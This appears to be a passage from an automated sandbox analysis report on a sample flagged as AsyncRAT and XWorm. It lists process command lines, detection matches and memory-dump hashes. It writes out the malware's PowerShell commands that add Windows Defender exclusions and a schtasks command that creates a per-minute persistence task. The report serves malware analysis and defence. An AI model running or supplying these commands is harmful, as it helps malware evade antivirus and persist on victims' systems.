                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '5q4X9fRo4b.exe'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:13
                                              Start time:17:04:13
                                              Start date:09/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:15
                                              Start time:17:04:23
                                              Start date:09/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SystemUser32.exe'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:16
                                              Start time:17:04:23
                                              Start date:09/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:17
                                              Start time:18:42:23
                                              Start date:09/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemUser32.exe'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:18
                                              Start time:18:42:23
                                              Start date:09/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:20
                                              Start time:18:42:43
                                              Start date:09/10/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser32" /tr "C:\Users\user\AppData\Roaming\SystemUser32.exe"
                                              Imagebase:0x7ff621990000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:21
                                              Start time:18:42:43
                                              Start date:09/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:22
                                              Start time:18:42:43
                                              Start date:09/10/2024
                                              Path:C:\Users\user\AppData\Roaming\SystemUser32.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\AppData\Roaming\SystemUser32.exe
                                              Imagebase:0xcf0000
                                              File size:42'496 bytes
                                              MD5 hash:9425780161C1CB105CD206D3F4FC6FA8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\SystemUser32.exe, Author: Joe Security
                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\SystemUser32.exe, Author: Joe Security
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\SystemUser32.exe, Author: Joe Security
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\SystemUser32.exe, Author: ditekSHen
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 84%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              Target ID:25
                                              Start time:18:42:55
                                              Start date:09/10/2024
                                              Path:C:\Users\user\AppData\Roaming\SystemUser32.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Roaming\SystemUser32.exe"
                                              Imagebase:0xb70000
                                              File size:42'496 bytes
                                              MD5 hash:9425780161C1CB105CD206D3F4FC6FA8
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:26
                                              Start time:18:43:01
                                              Start date:09/10/2024
                                              Path:C:\Users\user\AppData\Roaming\SystemUser32.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\AppData\Roaming\SystemUser32.exe
                                              Imagebase:0x600000
                                              File size:42'496 bytes
                                              MD5 hash:9425780161C1CB105CD206D3F4FC6FA8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:27
                                              Start time:18:43:04
                                              Start date:09/10/2024
                                              Path:C:\Users\user\AppData\Roaming\SystemUser32.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Roaming\SystemUser32.exe"
                                              Imagebase:0xae0000
                                              File size:42'496 bytes
                                              MD5 hash:9425780161C1CB105CD206D3F4FC6FA8
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true


                                                Execution Graph

                                                Execution Coverage:21%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:27.3%
                                                Total number of Nodes:11
                                                Total number of Limit Nodes:1
execution_graph (node id, address, API call, successor nodes):
6139 7ffaacce9798 -> 6140
6140 7ffaacce97a1 -> 6141, 6142
6141 7ffaacce9791
6142 7ffaacce9832 SetWindowsHookExW -> 6143
6143 7ffaacce9871
6148 7ffaacce7631 -> 6149
6149 7ffaacce764f CheckRemoteDebuggerPresent -> 6151
6151 7ffaacce76ef
6144 7ffaacce873d -> 6145
6145 7ffaacce875d RtlSetProcessIsCritical -> 6147
6147 7ffaacce9352

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2541963984.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacce0000_5q4X9fRo4b.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HK_H
                                                • API String ID: 0-1175406038
                                                • Opcode ID: e93803067d5eb53a59921fc39c82e5db74c6f31d3c8346dc16d406f67732b266
                                                • Instruction ID: 9cb0c7cbf0c83101ec01ee33846af89d3e7706cfa432314b862208b9b378cde1
                                                • Opcode Fuzzy Hash: e93803067d5eb53a59921fc39c82e5db74c6f31d3c8346dc16d406f67732b266
                                                • Instruction Fuzzy Hash: 3F728260B1D95A8BFB54FB78C456A79B2D2FF9A700F548578D01EC32C2DE28EC468781

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2541963984.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacce0000_5q4X9fRo4b.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: L_H
                                                • API String ID: 0-1918747621
                                                • Opcode ID: fb579c2f24cb3a1934d7c9d80b83d01859bbfc820dd17a0731c070e99eb346f3
                                                • Instruction ID: bc4cee8ecdfb5a59447a76bdf0cbf069d9669e2934a2c6dd356c3723b58f513f
                                                • Opcode Fuzzy Hash: fb579c2f24cb3a1934d7c9d80b83d01859bbfc820dd17a0731c070e99eb346f3
                                                • Instruction Fuzzy Hash: E602A4A1B2CA498BF754EB3C8459AB9B7D2FF99300F5445B9D04EC3293DF68E8418781

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
control_flow_graph (block id, address range, API call, successor blocks):
639 7ffaacce7631-7ffaacce76ed CheckRemoteDebuggerPresent -> 643, 644
643 7ffaacce76f5-7ffaacce7738
644 7ffaacce76ef -> 643
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2541963984.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacce0000_5q4X9fRo4b.jbxd
                                                Similarity
                                                • API ID: CheckDebuggerPresentRemote
                                                • String ID:
                                                • API String ID: 3662101638-0
                                                • Opcode ID: 3aa7d2c1c8d0d6b07e1508a3b6ac243d16c971487b1ae1e09e36e6b45c1c58d1
                                                • Instruction ID: dd4d157cb2ff80af406896f6cd4ac1701e527e5ee91df881ccd51f5ffe21fadb
                                                • Opcode Fuzzy Hash: 3aa7d2c1c8d0d6b07e1508a3b6ac243d16c971487b1ae1e09e36e6b45c1c58d1
                                                • Instruction Fuzzy Hash: F731007180875C8FDB58DF58C88ABE97BE0FF65321F04426AD489D7282DB34A8468B91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2541963984.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacce0000_5q4X9fRo4b.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 307cda94e3d357517f4f4d8135316a4cfab05c040281b1a415a795d5e2422ed9
                                                • Instruction ID: 9a8270781dc77449baee9abd484dbaca3495b2ab4ac0b597b3cfd9900198ea5c
                                                • Opcode Fuzzy Hash: 307cda94e3d357517f4f4d8135316a4cfab05c040281b1a415a795d5e2422ed9
                                                • Instruction Fuzzy Hash: 04F1A470919A8D8FEBA8DF28C8557E937E1FF55310F04826EE84DC7291CB7899458B81
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2541963984.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacce0000_5q4X9fRo4b.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8fe94094190654911469081b53a317b4983bc37b1079cdb54b9385250da26df5
                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2541963984.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacce0000_5q4X9fRo4b.jbxd
                                                Similarity
                                                • API ID: CriticalProcess
                                                • String ID: K_^$K_^'
                                                • API String ID: 2695349919-4239086072

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2541963984.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacce0000_5q4X9fRo4b.jbxd
                                                Similarity
                                                • API ID: HookWindows
                                                • String ID:
                                                • API String ID: 2559412058-0
                                                • Opcode Fuzzy Hash: 6f1fc3207d1d570644d8cb67ff433f65e516996217ce7e9c8c6c5948f4ff6775
                                                • Instruction Fuzzy Hash: DFF0E272A0D5488FE765EB1CE4858A87BE0FF4532074100BAE05DC7463CB69FC44C780
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1440312943.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffaacda0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                • Instruction ID: 43ea41e1f6c0a14adc3675a0c07277ec624c1149e27f531e8fd3b04f9800ceaa
                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                • Instruction Fuzzy Hash: BBE01A31B0C808CFEAA8DB0CE0409A977E1EBA933171151B7D15EC7561CA22EC559BC0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1439421351.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffaaccd0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: L_^5$L_^8$L_^F$L_^I$L_^K
                                                • API String ID: 0-3847582561
                                                • Opcode ID: 29bce9660e8502ad7bd2c320063eaed719f89a5c057029b8b031713abe4f3ab3
                                                • Instruction ID: b03e9b6cbcf809e185e0122594c1df6362a863fdc1a746159d10de827ffdc250
                                                • Opcode Fuzzy Hash: 29bce9660e8502ad7bd2c320063eaed719f89a5c057029b8b031713abe4f3ab3
                                                • Instruction Fuzzy Hash: 082104B7B141164E92017B7DB8059ED7B84CF84275349A2F2D39C8F513DF14608A8AD4
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1587933750.00007FFAACDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacdb0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72d81e65faaab6d0d56e2ef39f3a9219423f8995d8e0180cecc620870ffd3625
                                                • Instruction ID: 46a2a026a850d676c795f87d2b66f7b7b638860af73c76f503e238f981c4691b
                                                • Opcode Fuzzy Hash: 72d81e65faaab6d0d56e2ef39f3a9219423f8995d8e0180cecc620870ffd3625
                                                • Instruction Fuzzy Hash: 5ED16B75A0E78A9FF769BB6888555B9BBA1EF16310B0401FEE45DC70D3DA14DC0A83C1
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1586886114.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacce0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 91af913ae3d5cf0b2c9de9d959e7c618fefc9621b0ab5626ac36bc2748a4596c
                                                • Instruction ID: 38499ab48aebd2315153ec00356bec14d26664b9cae8ef6ea8571cc200f49e6c
                                                • Opcode Fuzzy Hash: 91af913ae3d5cf0b2c9de9d959e7c618fefc9621b0ab5626ac36bc2748a4596c
                                                • Instruction Fuzzy Hash: 19815CB250D7868FF3459B18D8964E17FE0FF5361A71841BAD0CDC7193ED15A84B8781
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1587933750.00007FFAACDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacdb0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 54ca4bbbe2499b8261a5e663c5acb270393ed3bf09c153c1217f222bee17a78e
                                                • Instruction ID: d3640852400dae1c2f6b771841e94c6bf434795ee16dd2fe2cc09bd308439a76
                                                • Opcode Fuzzy Hash: 54ca4bbbe2499b8261a5e663c5acb270393ed3bf09c153c1217f222bee17a78e
                                                • Instruction Fuzzy Hash: 97511462F0EA4A8FF799CB2C88516747BD2EF96260B5841BBC15DC7193DE24EC098381
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1587933750.00007FFAACDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacdb0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fe37fbf06854f72edd3a27f537b3cfa3d73877ccdc48483870c7c8be44d470e8
                                                • Instruction ID: 525acccfc53cb2e0aad21f857c4ea511024c96563ded2e997e81505e8e657706
                                                • Opcode Fuzzy Hash: fe37fbf06854f72edd3a27f537b3cfa3d73877ccdc48483870c7c8be44d470e8
                                                • Instruction Fuzzy Hash: 01413672B0EA498FF7A5D7689444AB4BBD1EF46220B4800FEC06DC7183EE18EC1883C1
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1585880347.00007FFAACBCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBCD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacbcd000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1f4bef75407860cc686c2d751846ff6e9ef1007c7d2f3a954f44f3173d402644
                                                • Instruction ID: 98125ef72d672227b71367888b26b41dba364d7bbb28292203567de88432ab14
                                                • Opcode Fuzzy Hash: 1f4bef75407860cc686c2d751846ff6e9ef1007c7d2f3a954f44f3173d402644
                                                • Instruction Fuzzy Hash: B041F57180EBC48FE7568B28D8959623FB0EF57320B1545EFD089CB1A3D625E84AC792
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1586886114.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacce0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b814889ef08cd21b5fb810131f3b366f05d5b649a8e9bf34618a27901c14be25
                                                • Instruction ID: 40257829bcb1dc06aa30d1b3b22c7413e7181402c548ecfa86d7aa59c58b5efd
                                                • Opcode Fuzzy Hash: b814889ef08cd21b5fb810131f3b366f05d5b649a8e9bf34618a27901c14be25
                                                • Instruction Fuzzy Hash: BA31A57191CB4C9FDB189F5CA84A6E97BE0FB99311F00822FE449D3651CB74A8558BC2
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1586886114.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacce0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 73c3db381f3b74e5fa25e4c5e454a0f9d6f85fb3d6048934f21ad5c3f4b705da
                                                • Instruction ID: 7386006ccbc55e36e75128b1354af4bc4d195c7fc05cd63701349fd97b04d31c
                                                • Opcode Fuzzy Hash: 73c3db381f3b74e5fa25e4c5e454a0f9d6f85fb3d6048934f21ad5c3f4b705da
                                                • Instruction Fuzzy Hash: A731D57190DB888FEB59DB68984A6E97FE0EF67320F0481AFC04DC7152D665980ACB91
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1587933750.00007FFAACDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacdb0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0a2eb5a376bfeabf986cfa8300784f11ac78828eb38e9dbc6e1581899b3bbfd4
                                                • Instruction ID: 746a2af492c4e0dcb2f0938c2fce2f426c5b6f397918083b310472d9211670ed
                                                • Opcode Fuzzy Hash: 0a2eb5a376bfeabf986cfa8300784f11ac78828eb38e9dbc6e1581899b3bbfd4
                                                • Instruction Fuzzy Hash: 9B21F562F0EA868FF7A5CB1C84551746AD1EF62290B8981BAD16DC71D3DE28DC099381
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1587933750.00007FFAACDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacdb0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 431985be4cc850a9e2e162514e7e0a9373abee9702c275fe2595e5442df83a0f
                                                • Instruction ID: c6fc0ee647e881d3fb452a53e68891c1820d19c551c1ca00fd6d41b549d506bd
                                                • Opcode Fuzzy Hash: 431985be4cc850a9e2e162514e7e0a9373abee9702c275fe2595e5442df83a0f
                                                • Instruction Fuzzy Hash: B311C672A4F6498FF7A5D72894549747FD1EF4622078D40FAD16DC7193DE18EC148381
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1586886114.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacce0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                • Instruction ID: 2679195378a422fb07696bd46d7ab694e2d0dc30f21eb567d9445c9b80d07752
                                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                • Instruction Fuzzy Hash: BD01847010CB088FD744EF0CE051AA5B3E0FB89320F10052DE58AC3661DB22E882CB41
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1586886114.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacce0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 274be616b2a51ed74687d74400572b31c09e48ba4e80211f0984dd83a716637d
                                                • Instruction ID: f18f48c0224386ac2d71641b8cff1741d7e500fa01fb04232e4e3eb1e6b8b462
                                                • Opcode Fuzzy Hash: 274be616b2a51ed74687d74400572b31c09e48ba4e80211f0984dd83a716637d
                                                • Instruction Fuzzy Hash: E3E04875904A4C8F9B44DF18D4555E57FE0FF65301B01425BE41DD7120DB71D958CBC1
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1585880347.00007FFAACBCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBCD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacbcd000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ebc07732169cc6b5beb847de7f21c8cb7c97c45c15caa677e14c31db907f577b
                                                • Instruction ID: 9dd6b420065ad05d6593ac4ed4e616991cd3501f6746d536bf3b677321647f04
                                                • Opcode Fuzzy Hash: ebc07732169cc6b5beb847de7f21c8cb7c97c45c15caa677e14c31db907f577b
                                                • Instruction Fuzzy Hash: 4CE01A3061ED09CFDA95EB29C085D2637E1FB68300B204468D05ECB251C635F882CB81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1586886114.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacce0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: K_^$K_^$K_^$K_^
                                                • API String ID: 0-3666970850
                                                • Opcode ID: 8872752845eff945826bc52692320a7512e7eb3dcd42072a5d854f32de3ca58a
                                                • Instruction ID: c312ab7cce92cc6105c1170f4f718693f5fae9670712ededd1460dcf4a00fee2
                                                • Opcode Fuzzy Hash: 8872752845eff945826bc52692320a7512e7eb3dcd42072a5d854f32de3ca58a
                                                • Instruction Fuzzy Hash: 40419FA290E7D29FF75A0B1C586A0E57FE0FF63215B4D42F7C0C8CB493EA19554A8391
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1586886114.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_7ffaacce0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: K_^$K_^$K_^$K_^
                                                • API String ID: 0-3666970850
                                                • Opcode ID: e1c98ce7ec0dee100958bc9f6607f33bf4a13c5b3c41a77d3f66f2daa04a40b8
                                                • Instruction ID: ef9316e46c98ba4027b5fced5b84dbbe838176eef8df2cbfc922c1ea4f3ba252
                                                • Opcode Fuzzy Hash: e1c98ce7ec0dee100958bc9f6607f33bf4a13c5b3c41a77d3f66f2daa04a40b8
                                                • Instruction Fuzzy Hash: 03319E9290EBD38BF65A0B1C58650E17FE0FF63229B4D42F2C0CC8B593EE19994A42D1
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1782647268.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffaacda0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ca29e748ff8d4e1a370d7043a00fa4a92d067251f2f6d9753fc704d975ceb16
                                                • Instruction ID: ac04aeb4f82eac121930666c9f67dcf54175dae68829a99faeb3950f639cc263
                                                • Opcode Fuzzy Hash: 6ca29e748ff8d4e1a370d7043a00fa4a92d067251f2f6d9753fc704d975ceb16
                                                • Instruction Fuzzy Hash: 15C159B1A0EA8ACFF765AB7888555B9BBD1EF56710B0401BEE45DC70D3DA18D80A83C1
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1782647268.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffaacda0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: de40dde5839849101e90950a9f13ffcf2f0c66722e5ba11c866efdb0fb1b46fd
                                                • Instruction ID: c11d80cefd933839e42dd95d07738b3f265563ff57aaa23cafb200dd0b47564d
                                                • Opcode Fuzzy Hash: de40dde5839849101e90950a9f13ffcf2f0c66722e5ba11c866efdb0fb1b46fd
                                                • Instruction Fuzzy Hash: 668125A6A1FB86CFF76A97684855574BBA1EF16B10B1840FED05DCB0D3D918DC0A83C1
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1781498142.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffaaccd0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: caea7efab79228d449b8c6962fc5f952930926ef390641a1a5bd676990ac2ceb
                                                • Instruction ID: 974d1f4372455f75a80e34a9e25d04949abf9bad501f9313682be9e04dbe6fd2
                                                • Opcode Fuzzy Hash: caea7efab79228d449b8c6962fc5f952930926ef390641a1a5bd676990ac2ceb
                                                • Instruction Fuzzy Hash: FC410A7190CB888FEB199F5CAC466A97FE0FB95311F04416FE44DD3252DA74A815CBC2
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1779998454.00007FFAACBBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffaacbbd000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4b0413d2f8e0225256751b12c26558243ff32d7e297d88da2e914bd0b8d2ce35
